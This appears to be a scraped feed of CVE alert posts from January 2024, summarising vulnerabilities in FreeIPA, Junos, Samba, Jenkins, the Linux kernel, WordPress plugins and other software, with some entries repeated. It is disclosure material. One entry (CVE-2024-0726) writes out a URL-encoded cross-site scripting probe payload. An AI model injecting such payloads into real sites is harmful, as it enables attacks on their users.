🚨 CVE-2023-5455A Cross-site request forgery vulnerability exists in ipa/session/login_password in all supported versions of IPA. This flaw allows an attacker to trick the user into submitting a request that could perform actions as the user, resulting in a loss of confidentiality and system integrity. During community penetration testing it was found that for certain HTTP end-points FreeIPA does not ensure CSRF protection. Due to implementation details one cannot use this flaw for reflection of a cookie representing already logged-in user. An attacker would always have to go through a new authentication attempt.🎖@cveNotify |
|
| 2024-01-26 01:37:32 |
🚨 CVE-2024-0456An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project🎖@cveNotify |
|
| 2024-01-26 01:37:25 |
🚨 CVE-2023-5455A Cross-site request forgery vulnerability exists in ipa/session/login_password in all supported versions of IPA. This flaw allows an attacker to trick the user into submitting a request that could perform actions as the user, resulting in a loss of confidentiality and system integrity. During community penetration testing it was found that for certain HTTP end-points FreeIPA does not ensure CSRF protection. Due to implementation details one cannot use this flaw for reflection of a cookie representing already logged-in user. An attacker would always have to go through a new authentication attempt.🎖@cveNotify |
|
| 2024-01-26 01:37:24 |
🚨 CVE-2024-20677A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365.3D models in Office documents that were previously inserted from a FBX file will continue to work as expected unless the Link to File option was chosen at insert time.This change is effective as of the January 9, 2024 security update.🎖@cveNotify |
|
| 2024-01-26 00:37:32 |
🚨 CVE-2024-23617A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution.🎖@cveNotify |
|
| 2024-01-26 00:37:25 |
🚨 CVE-2024-23613A buffer overflow vulnerability exists in Symantec Deployment Solution version 7.9 when parsing UpdateComputer tokens. A remote, anonymous attacker can exploit this vulnerability to achieve remote code execution as SYSTEM.🎖@cveNotify |
|
| 2024-01-26 00:37:24 |
🚨 CVE-2024-21617An Incomplete Cleanup vulnerability in Nonstop active routing (NSR) component of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause memory leak leading to Denial of Service (DoS).On all Junos OS platforms, when NSR is enabled, a BGP flap will cause memory leak. A manual reboot of the system will restore the services.Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability.The memory usage can be monitored using the below commands.user@host> show chassis routing-engine no-forwardinguser@host> show system memory | no-moreThis issue affects:Juniper Networks Junos OS * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S1, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2.This issue does not affect Junos OS versions earlier than 20.4R3-S7.🎖@cveNotify |
|
| 2024-01-25 23:37:32 |
🚨 CVE-2024-0889A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 23:37:25 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-01-25 23:37:24 |
🚨 CVE-2023-36851A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.With a specific request to webauth_operation.phpthat doesn't require authentication, an attacker is able to upload and download arbitrary files via J-Web, leading to a loss of integrity or confidentiality, which may allow chaining to other vulnerabilities.This issue affects Juniper Networks Junos OS on SRX Series: * 21.2 versions prior to 21.2R3-S8; * 21.4 versions prior to 21.4R3-S6; * 22.1 versions prior to 22.1R3-S5; * 22.2 versions prior to 22.2R3-S3; * 22.3 versions prior to 22.3R3-S2; * 22.4 versions prior to 22,4R2-S2, 22.4R3; * 23.2 versions prior to 23.2R1-S2, 23.2R2.🎖@cveNotify |
|
| 2024-01-25 22:07:32 |
🚨 CVE-2022-3470A vulnerability was found in SourceCodester Human Resource Management System. It has been classified as critical. Affected is an unknown function of the file getstatecity.php. The manipulation of the argument sc leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 22:07:25 |
🚨 CVE-2009-3168Mevin Productions Basic PHP Events Lister 2.0 does not properly restrict access to (1) admin/reset.php and (2) admin/user_add.php, which allows remote authenticated users to reset administrative passwords or add administrators via a direct request.🎖@cveNotify |
|
| 2024-01-25 22:07:24 |
🚨 CVE-2005-1835NEXTWEB (i)Site stores databases under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to databases/Users.mdb.🎖@cveNotify |
|
| 2024-01-25 21:37:33 |
🚨 CVE-2005-1685episodex guestbook allows remote attackers to bypass authentication and edit scripts via a direct request to admin.asp.🎖@cveNotify |
|
| 2024-01-25 21:37:26 |
🚨 CVE-2004-2144Baal Smart Forms before 3.2 allows remote attackers to bypass authentication and obtain system access via a direct request to regadmin.php.🎖@cveNotify |
|
| 2024-01-25 21:37:25 |
🚨 CVE-2001-1515Macintosh clients, when using NT file system volumes on Windows 2000 SP1, create subdirectories and automatically modify the inherited NTFS permissions, which may cause the directories to have less restrictive permissions than intended.🎖@cveNotify |
|
| 2024-01-25 21:37:24 |
🚨 CVE-2001-0195sash before 3.4-4 in Debian GNU/Linux does not properly clone /etc/shadow, which makes it world-readable and could allow local users to gain privileges via password cracking.🎖@cveNotify |
|
| 2024-01-25 21:07:32 |
🚨 CVE-2005-3140Procom NetFORCE 800 4.02 M10 Build 20 and possibly other versions sends the NIS password map (passwd.nis) as a file attachment in diagnostic e-mail messages, which allows remote attackers to obtain the cleartext NIS password hashes.🎖@cveNotify |
|
| 2024-01-25 21:07:26 |
🚨 CVE-2005-1668YusASP Web Asset Manager 1.0 allows remote attackers to gain privileges via a direct request to assetmanager.asp.🎖@cveNotify |
|
| 2024-01-25 21:07:25 |
🚨 CVE-2002-1949The Network Attached Storage (NAS) Administration Web Page for Iomega NAS A300U transmits passwords in cleartext, which allows remote attackers to sniff the administrative password.🎖@cveNotify |
|
| 2024-01-25 21:07:24 |
🚨 CVE-2002-1798MidiCart PHP, PHP Plus, and PHP Maxi allows remote attackers to (1) upload arbitrary php files via a direct request to admin/upload.php or (2) access sensitive information via a direct request to admin/credit_card_info.php.🎖@cveNotify |
|
| 2024-01-25 20:37:32 |
🚨 CVE-2023-3019A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2024-01-25 20:37:26 |
🚨 CVE-2023-34968A path disclosure vulnerability was found in Samba. As part of the Spotlight protocol, Samba discloses the server-side absolute path of shares, files, and directories in the results for search queries. This flaw allows a malicious client or an attacker with a targeted RPC request to view the information that is part of the disclosed path.🎖@cveNotify |
|
| 2024-01-25 20:37:25 |
🚨 CVE-2022-2127An out-of-bounds read vulnerability was found in Samba due to insufficient length checks in winbindd_pam_auth_crap.c. When performing NTLM authentication, the client replies to cryptographic challenges back to the server. These replies have variable lengths, and Winbind fails to check the lan manager response length. When Winbind is used for NTLM authentication, a maliciously crafted request can trigger an out-of-bounds read in Winbind, possibly resulting in a crash.🎖@cveNotify |
|
| 2024-01-25 20:37:24 |
🚨 CVE-2022-4281A vulnerability has been found in Facepay 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /face-recognition-php/facepay-master/camera.php. The manipulation of the argument userId leads to authorization bypass. The attack can be launched remotely. The identifier VDB-214789 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 20:07:35 |
🚨 CVE-2024-0730A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 20:07:31 |
🚨 CVE-2024-0728A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.🎖@cveNotify |
|
| 2024-01-25 20:07:30 |
🚨 CVE-2024-0723A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.🎖@cveNotify |
|
| 2024-01-25 20:07:29 |
🚨 CVE-2024-0722A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 20:07:26 |
🚨 CVE-2024-0721A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 20:07:25 |
🚨 CVE-2023-51947Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.🎖@cveNotify |
|
| 2024-01-25 20:07:24 |
🚨 CVE-2023-50028In the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.🎖@cveNotify |
|
| 2024-01-25 19:37:32 |
🚨 CVE-2024-22729NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.🎖@cveNotify |
|
| 2024-01-25 19:37:25 |
🚨 CVE-2023-51948A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.🎖@cveNotify |
|
| 2024-01-25 19:37:24 |
🚨 CVE-2023-25529NVIDIA DGX H100 BMC and DGX A100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a leak of another user’s session token by observing timing discrepancies between server responses. A successful exploit of this vulnerability may lead to information disclosure, escalation of privileges, and data tampering.🎖@cveNotify |
|
| 2024-01-25 19:07:24 |
🚨 CVE-2024-0712A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-25 18:37:32 |
🚨 CVE-2024-22876StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator.🎖@cveNotify |
|
| 2024-01-25 18:37:26 |
🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-01-25 18:37:25 |
🚨 CVE-2023-5824Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug.🎖@cveNotify |
|
| 2024-01-25 18:37:24 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation problem.🎖@cveNotify |
|
| 2024-01-25 18:07:24 |
🚨 CVE-2024-22877StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.🎖@cveNotify |
|
| 2024-01-25 17:37:33 |
🚨 CVE-2022-20937A vulnerability in a feature that monitors RADIUS requests on Cisco Identity Services Engine (ISE) Software could allow an unauthenticated, remote attacker to negatively affect the performance of an affected device. This vulnerability is due to insufficient management of system resources. An attacker could exploit this vulnerability by taking actions that cause Cisco ISE Software to receive specific RADIUS traffic. A successful and sustained exploit of this vulnerability could allow the attacker to cause reduced performance of the affected device, resulting in significant delays to RADIUS authentications. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2024-01-25 17:37:26 |
🚨 CVE-2022-20713A vulnerability in the VPN web client services component of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct browser-based attacks against users of an affected device. This vulnerability is due to improper validation of input that is passed to the VPN web client services component before being returned to the browser that is in use. An attacker could exploit this vulnerability by persuading a user to visit a website that is designed to pass malicious requests to a device that is running Cisco ASA Software or Cisco FTD Software and has web services endpoints supporting VPN features enabled. A successful exploit could allow the attacker to reflect malicious input from the affected device to the browser that is in use and conduct browser-based attacks, including cross-site scripting attacks. The attacker could not directly impact the affected device.🎖@cveNotify |
|
| 2024-01-25 17:37:25 |
🚨 CVE-2017-6744The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE Software contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP - Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. A successful exploit could allow the attacker to execute arbitrary code and obtain full control of the affected system or cause the affected system to reload. Customers are advised to apply the workaround as contained in the Workarounds section below. Fixed software information is available via the Cisco IOS Software Checker. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. There are workarounds that address these vulnerabilities.🎖@cveNotify |
|
| 2024-01-25 17:07:25 |
🚨 CVE-2023-6548Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway allows an attacker with access to NSIP, CLIP or SNIP with management interface to perform Authenticated (low privileged) remote code execution on Management Interface.🎖@cveNotify |
|
| 2024-01-25 17:07:24 |
🚨 CVE-2023-6395The Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server.🎖@cveNotify |
|
| 2024-01-25 16:37:36 |
🚨 CVE-2024-22529TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.🎖@cveNotify |
|
| 2024-01-25 16:37:35 |
🚨 CVE-2024-0822An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command.🎖@cveNotify |
|
| 2024-01-25 16:37:31 |
🚨 CVE-2023-3181The C:\Program Files (x86)\Splashtop\Splashtop Software Updater\uninst.exe process creates a folder at C:\Windows\Temp~nsu.tmp and copies itself to it as Au_.exe. The C:\Windows\Temp~nsu.tmp\Au_.exe file is automatically launched as SYSTEM when the system reboots or when a standard user runs an MSI repair using Splashtop Streamer’s Windows Installer. Since the C:\Windows\Temp~nsu.tmp folder inherits permissions from C:\Windows\Temp and Au_.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges.🎖@cveNotify |
|
| 2024-01-25 16:37:30 |
🚨 CVE-2024-22409DataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges gave too many broad permissions to low privileged users. These have been constrained in PR #9067 to prevent abuse. This issue can result in privilege escalation for lower privileged users up to admin privileges, potentially, if a group with admin privileges exists. May not impact instances that have modified default privileges. This issue has been addressed in datahub version 0.12.1. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-01-25 16:37:26 |
🚨 CVE-2023-34063Aria Automation contains a Missing Access Control vulnerability.An authenticated malicious actor may exploit this vulnerability leading to unauthorized access to remote organizations and workflows.🎖@cveNotify |
|
| 2024-01-25 16:37:25 |
🚨 CVE-2023-6944A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.🎖@cveNotify |
|
| 2024-01-25 16:37:24 |
🚨 CVE-2024-0217A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost.🎖@cveNotify |
|
| 2024-01-25 16:07:26 |
🚨 CVE-2022-45083Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2.🎖@cveNotify |
|
| 2024-01-25 16:07:25 |
🚨 CVE-2023-49098Discourse-reactions is a plugin that allows user to add their reactions to the post. Data about a user's reaction notifications could be exposed. This vulnerability was patched in commit 2c26939.🎖@cveNotify |
|
| 2024-01-25 16:07:24 |
🚨 CVE-2023-48297Discourse is a platform for community discussion. The message serializer uses the full list of expanded chat mentions (@all and @here) which can lead to a very long array of users. This issue was patched in versions 3.1.4 and beta 3.2.0.beta5.🎖@cveNotify |
|
| 2024-01-25 15:37:36 |
🚨 CVE-2024-22729NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.🎖@cveNotify |
|
| 2024-01-25 15:37:35 |
🚨 CVE-2024-0879Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address.🎖@cveNotify |
|
| 2024-01-25 15:37:31 |
🚨 CVE-2024-22915A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.🎖@cveNotify |
|
| 2024-01-25 15:37:30 |
🚨 CVE-2024-22913A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.🎖@cveNotify |
|
| 2024-01-25 15:37:29 |
🚨 CVE-2024-22912A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.🎖@cveNotify |
|
| 2024-01-25 15:37:26 |
🚨 CVE-2024-22911A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.🎖@cveNotify |
|
| 2024-01-25 15:37:25 |
🚨 CVE-2024-21655Discourse is a platform for community discussion. For fields that are client editable, limits on sizes are not imposed. This allows a malicious actor to cause a Discourse instance to use excessive disk space and also often excessive bandwidth. The issue is patched 3.1.4 and 3.2.0.beta4.🎖@cveNotify |
|
| 2024-01-25 15:37:24 |
🚨 CVE-2023-49099Discourse is a platform for community discussion. Under very specific circumstances, secure upload URLs associated with posts can be accessed by guest users even when login is required. This vulnerability has been patched in 3.2.0.beta4 and 3.1.4.🎖@cveNotify |
|
| 2024-01-25 15:07:26 |
🚨 CVE-2024-22956swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838🎖@cveNotify |
|
| 2024-01-25 15:07:25 |
🚨 CVE-2024-22919swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.🎖@cveNotify |
|
| 2024-01-25 15:07:24 |
🚨 CVE-2024-23659SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.🎖@cveNotify |
|
| 2024-01-25 14:37:38 |
🚨 CVE-2023-5384A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.🎖@cveNotify |
|
| 2024-01-25 14:37:31 |
🚨 CVE-2023-3629A flaw was found in Infinispan's REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.🎖@cveNotify |
|
| 2024-01-25 14:37:30 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2024-01-25 14:37:26 |
🚨 CVE-2023-46218This flaw allows a malicious HTTP server to set "super cookies" in curl thatare then passed back to more origins than what is otherwise allowed orpossible. This allows a site to set cookies that then would get sent todifferent and unrelated sites and domains.It could do this by exploiting a mixed case flaw in curl's function thatverifies a given cookie domain against the Public Suffix List (PSL). Forexample a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.🎖@cveNotify |
|
| 2024-01-25 14:37:25 |
🚨 CVE-2023-46672An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances.The prerequisites for the manifestation of this issue are: * Logstash is configured to log in JSON format https://www.elastic.co/guide/en/logstash/current/running-logstash-command-line.html , which is not the default logging format. * Sensitive data is stored in the Logstash keystore and referenced as a variable in Logstash configuration.🎖@cveNotify |
|
| 2024-01-25 14:37:24 |
🚨 CVE-2023-4806A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.🎖@cveNotify |
|
| 2024-01-25 14:07:32 |
🚨 CVE-2024-23985EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command.🎖@cveNotify |
|
| 2024-01-25 14:07:26 |
🚨 CVE-2024-0625The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-01-25 14:07:25 |
🚨 CVE-2024-0617The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue.🎖@cveNotify |
|
| 2024-01-25 14:07:24 |
🚨 CVE-2024-0726A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-25 12:37:26 |
🚨 CVE-2024-23771darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.🎖@cveNotify |
|
| 2024-01-25 12:37:25 |
🚨 CVE-2023-6710A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.🎖@cveNotify |
|
| 2024-01-25 10:37:24 |
🚨 CVE-2024-23897Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2024-01-25 09:37:25 |
🚨 CVE-2023-5868A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.🎖@cveNotify |
|
| 2024-01-25 09:37:24 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2024-01-25 08:37:30 |
🚨 CVE-2023-33759SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack.🎖@cveNotify |
|
| 2024-01-25 08:37:29 |
🚨 CVE-2023-33758Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component.🎖@cveNotify |
|
| 2024-01-25 08:37:26 |
🚨 CVE-2023-33757A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-01-25 08:37:25 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-25 08:37:24 |
🚨 CVE-2023-3812An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-25 07:37:25 |
🚨 CVE-2024-23307Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow.🎖@cveNotify |
|
| 2024-01-25 07:37:24 |
🚨 CVE-2024-22099NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.This issue affects Linux kernel: v2.6.12-rc2.🎖@cveNotify |
|
| 2024-01-25 06:37:24 |
🚨 CVE-2023-50785Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal.🎖@cveNotify |
|
| 2024-01-25 05:37:24 |
🚨 CVE-2024-23985EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command.🎖@cveNotify |
|
| 2024-01-25 04:37:24 |
